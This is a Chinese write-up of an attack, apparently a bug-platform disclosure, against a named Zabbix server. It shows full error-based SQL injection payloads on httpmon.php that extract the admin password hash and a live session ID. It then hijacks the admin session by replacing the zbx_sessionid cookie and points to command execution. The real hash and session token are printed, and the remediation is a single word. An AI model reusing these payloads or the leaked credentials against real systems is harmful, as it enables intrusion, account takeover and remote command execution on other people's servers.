盛大广告 Zabbix地址 http://zabbix.sa.snyu.com/ guest没禁用 先用guest直接登陆 然后来到这里 检测发现报错 尝试构造语句注入 httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passw
guest没禁用 先用guest直接登陆

然后来到这里 检测发现报错

尝试构造语句注入
httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
爆出干货

adnin 21bf5f24883e20465a9876c4aa8a4dc9
无奈小弟能力有限 21bf5f24883e20465a9876c4aa8a4dc9 MD5解不开 换个思路继续
尝试cookie欺骗 构造语句
httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid=1 LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
爆出session

session:00afc31ea35f3f156ebb5c4b3b119be3
然后进行欺骗 直接替换zbx_sessionid为这个00afc31ea35f3f156ebb5c4b3b119be3
成功以administrator登陆

再来到这里 指令随意改

然后来到这里 可以执行刚才设置的指令

就到这里了 继续的话你懂得 我就不试了.
修复方案:
过滤~
过滤~
你比我懂~